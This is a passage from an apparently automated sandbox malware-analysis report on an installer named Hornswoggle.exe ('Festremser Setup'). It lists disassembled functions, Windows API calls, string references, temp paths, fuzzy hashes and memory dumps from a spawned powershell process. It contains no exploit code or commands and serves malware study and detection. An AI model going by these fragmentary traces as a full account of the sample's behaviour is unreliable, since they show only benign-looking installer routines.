                                                        • CharPrevA.USER32(?,?,76003410,C:\Users\user\AppData\Local\Temp\,00000000,00403206,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 00406148
                                                        Strings
                                                        • *?|<>/":, xrefs: 00406116
                                                        • "C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 0040610A
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004060CF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Char$Next$Prev
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 589700163-3968548147
                                                        • Opcode ID: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                        • Instruction ID: f4547238e9b15f098583f6e7a29ad5d1a016b5704a22f35d65a3ab7f018ae362
                                                        • Opcode Fuzzy Hash: 2fcb21d4fe3ff3b998ebc2bd8af41eb25bf4dc23d8027269f2ae341fb2b2b84f
                                                        • Instruction Fuzzy Hash: EF1104A18043A22DFB3246284C44B77AF884F5A764F19407BE4C6763C3CA7C9C52866D
                                                        APIs
                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040CC
                                                        • GetSysColor.USER32(00000000), ref: 004040E8
                                                        • SetTextColor.GDI32(?,00000000), ref: 004040F4
                                                        • SetBkMode.GDI32(?,?), ref: 00404100
                                                        • GetSysColor.USER32(?), ref: 00404113
                                                        • SetBkColor.GDI32(?,?), ref: 00404123
                                                        • DeleteObject.GDI32(?), ref: 0040413D
                                                        • CreateBrushIndirect.GDI32(?), ref: 00404147
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction ID: b9626d203e07c142b7df78836af29c525e1d4ad6db78ea87979aa0b8fd7aa94c
                                                        • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                        • Instruction Fuzzy Hash: 9C219671904704ABC7219F78DD48B4BBBF8AF41714F048529E996F63E0D734E944CB55
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000), ref: 00402C2F
                                                        • GetTickCount.KERNEL32 ref: 00402C4D
                                                        • wsprintfA.USER32 ref: 00402C7B
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                          • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                          • Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,00000000,00000000,00000000), ref: 004050D8
                                                          • Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsnA627.tmp\), ref: 004050EA
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                          • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402CAD
                                                          • Part of subcall function 00402BFB: MulDiv.KERNEL32(000B566A,00000064,000B8A01), ref: 00402C10
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 722711167-2449383134
                                                        • Opcode ID: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                        • Instruction ID: 50736a5f322e453d47399e53c3729a9749aec8e4ed59b6a4d84230157c1bc9e9
                                                        • Opcode Fuzzy Hash: f559af882b1b1cae22a8665ce90804d298b80873341603f7796877a047f00541
                                                        • Instruction Fuzzy Hash: 400161B090A624EBEB21AF64EF0DD9F7768EB04701B444177F405B11E4D6B89942C69E
                                                        APIs
                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
                                                        • GetMessagePos.USER32 ref: 0040496A
                                                        • ScreenToClient.USER32(?,?), ref: 00404984
                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$ClientScreen
                                                        • String ID: f
                                                        • API String ID: 41195575-1993550816
                                                        • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction ID: 9a5aaf7a7a2eb46524cfe6ed05727662581176125bc7a9594c14671d6fd5834d
                                                        • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                        • Instruction Fuzzy Hash: D60152B1D00219BADB11DBA4DC45FFFBBBCAF55711F10416BBA10B61C0C7B869018BA5
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                        • GlobalFree.KERNEL32(?), ref: 0040276F
                                                        • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                        • String ID:
                                                        • API String ID: 2667972263-0
                                                        • Opcode ID: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                        • Instruction ID: 485419aab899adaa45f09767fc84dfb68f9751acdadaf5e244b928a283e6c860
                                                        • Opcode Fuzzy Hash: ca0be688d7f720411948d387ee0049612bb77ca8bca973687b1d637323e3bb01
                                                        • Instruction Fuzzy Hash: 0A21AE71800128BBCF116FA5CE89DAE7A79EF08364F10423AF921762D0C7795D018F98
                                                        APIs
                                                        • lstrlenA.KERNEL32(Festremser Setup: Completed,Festremser Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                        • wsprintfA.USER32 ref: 004048E3
                                                        • SetDlgItemTextA.USER32(?,Festremser Setup: Completed), ref: 004048F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ItemTextlstrlenwsprintf
                                                        • String ID: %u.%u%s%s$Festremser Setup: Completed
                                                        • API String ID: 3540041739-2766138748
                                                        • Opcode ID: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
                                                        • Instruction ID: c0766d521516c7b6303674c7dd8cea214f166acaf9b397f83c092fcb524d35e8
                                                        • Opcode Fuzzy Hash: 816a97f40fb741a7874f6231f68a2f52d84a672703b9ff014e4c8c1b7defe931
                                                        • Instruction Fuzzy Hash: 6A110A736041283BDB0076ADDC45EAF3288DB85374F254637FA65F21D1EA78CC1285E8
                                                        APIs
                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0
                                                          • Part of subcall function 00402BFB: MulDiv.KERNEL32(000B566A,00000064,000B8A01), ref: 00402C10
                                                        • wsprintfA.USER32 ref: 00402BCE
                                                        • SetWindowTextA.USER32(?,?), ref: 00402BDE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: same dumps as listed for the first function above
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Text$ItemWindowwsprintf
                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                        • API String ID: 3537556175-1158693248
                                                        • Opcode ID: 65f3f8e2d2ec534689718060328c8fe9c8f3efb2befb17072f1eb4ac46e499d2
                                                        • Instruction ID: 452401c706e3d4b7d528196fec4e840a2acb2731f509fc9f744d6656898438ee
                                                        • Opcode Fuzzy Hash: 65f3f8e2d2ec534689718060328c8fe9c8f3efb2befb17072f1eb4ac46e499d2
                                                        • Instruction Fuzzy Hash: ABF0F0B18001049FDF014F60EE08AAE37B8EB04304F04807BF542F50D2D7B9AD46CB68
                                                        APIs
                                                        • GetDlgItem.USER32(?), ref: 00401CE2
                                                        • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                        • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                        • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                        • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                        • String ID:
                                                        • API String ID: 1849352358-0
                                                        • Opcode ID: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                        • Instruction ID: 869b35d44be7719ac4f8667573c2d83536e062a508785c5670752e956bf1946f
                                                        • Opcode Fuzzy Hash: 4b124ebf7538d090bfdb3da7142055cc4b6059543a11cd4ffa057e0c03021937
                                                        • Instruction Fuzzy Hash: 1BF0ECB2A04114AFEB01ABE4DD88DAFB7BDEB54305B104476F602F6191C7749D018B79
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00401D3B
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                        • CreateFontIndirectA.GDI32(0040A808), ref: 00401DB3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                        • String ID:
                                                        • API String ID: 3808545654-0
                                                        • Opcode ID: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
                                                        • Instruction ID: 002072324c9ca14b61f47775792bd0911152047613ce7f91f46ea316c06ba8c0
                                                        • Opcode Fuzzy Hash: d1d98ef4ca3702c11c3c6dceaa5369c7d293144b8b7f1186970544015a90a800
                                                        • Instruction Fuzzy Hash: 22016232944340AFE7016770AE5EBAA3FA89795305F108479F641B62E2C67801568F6F
                                                        APIs
                                                        • SetWindowTextA.USER32(00000000,00422F20), ref: 00403B40
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: TextWindow
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$1033$Festremser Setup: Completed
                                                        • API String ID: 530164218-2631969466
                                                        • Opcode ID: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
                                                        • Instruction ID: 4ecc7a7cce5d2b157b8937249730f08b858357f8198c33761da0ca3de106299a
                                                        • Opcode Fuzzy Hash: dc7de13f03dcb223900496a96d71cfcacf6227c358a972dc05920cca8a73c9bc
                                                        • Instruction Fuzzy Hash: CE11C971B006119BC7309F55DC909737B7CEB8571A364817FD90167391D73DAD029A58
                                                        APIs
                                                        • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058DB
                                                        • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403218,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040341B), ref: 004058E4
                                                        • lstrcatA.KERNEL32(?,00409014), ref: 004058F5
                                                        Strings
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004058D5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                        • API String ID: 2659869361-3355392842
                                                        • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction ID: 3de60a59262c475c5440d19c682801eda6224deee4fb27ea49e877a9fa99e37c
                                                        • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                        • Instruction Fuzzy Hash: A6D0A972605A303AD20233198C05E8B3A08CF26351B040032F641B22A2CA7C0E418BFE
                                                        APIs
                                                        • CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,76003410,?,76002EE0,00405725,?,76003410,76002EE0,00000000), ref: 0040597C
                                                        • CharNextA.USER32(00000000), ref: 00405981
                                                        • CharNextA.USER32(00000000), ref: 00405995
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharNext
                                                        • String ID: C:\
                                                        • API String ID: 3213498283-3404278061
                                                        • Opcode ID: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                        • Instruction ID: 93fa8612b98c37d3538e1dab61372dab2b439c5e428625c22ffade58a408e5cb
                                                        • Opcode Fuzzy Hash: c01f0a1332e094523614662ca2a683f3687d2570a221d834ee5f6cec315170af
                                                        • Instruction Fuzzy Hash: D0F096D1909F60ABFB3292684C54B775B8DCB55771F18547BE540B62C2C27C48408FAA
                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 0040501F
                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405070
                                                          • Part of subcall function 00404094: SendMessageA.USER32(0001043A,00000000,00000000,00000000), ref: 004040A6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Window$CallMessageProcSendVisible
                                                        • String ID:
                                                        • API String ID: 3748168415-3916222277
                                                        • Opcode ID: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                        • Instruction ID: c10ccb832a2a3496aa312e1d90523b33251ee11bfabb6cbb9dcba6f20acc8f53
                                                        • Opcode Fuzzy Hash: 0b9e3fe4afe9fd5950d24fc38bd805c0ffc83546a9c92a8d1e346af401a4be56
                                                        • Instruction Fuzzy Hash: ED018471504609ABDF205F61EC80EAF3725EB84754F148037FB01751E2C77A8C929FAA
                                                        APIs
                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405922
                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D22,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405930
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-3370423016
                                                        • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction ID: 8de3941b568bd0f8b26bcb964e879cd368c776abfab0e8ce3c3ebd0dc0734e68
                                                        • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                                        • Instruction Fuzzy Hash: 1CD0C7B2409D70AEE3036314DC04F9F6A48DF27715F094462E181E61A1C6BC5D814BED
                                                        APIs
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405A63
                                                        • CharNextA.USER32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A74
                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                        • String ID:
                                                        • API String ID: 190613189-0
                                                        • Opcode ID: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                        • Instruction ID: 761e0a114986e2dc795515ee57e72db75caae44d6787476300dd9688655b7936
                                                        • Opcode Fuzzy Hash: ca0b18bb87844b4bf03c2f7d3918b69422ab9094ff5260ece92dc9b1c2472986
                                                        • Instruction Fuzzy Hash: 2FF06232605518BFC7129FA5DC40D9EBBA8EF16350B2541B5F800F7250D674EE019FA9
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291769093.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23288068246.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7ad0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23280995551.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_4fb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.23291431152.0000000009280000.00000040.00000800.00020000.00000000.sdmp, Offset: 09280000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_9280000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
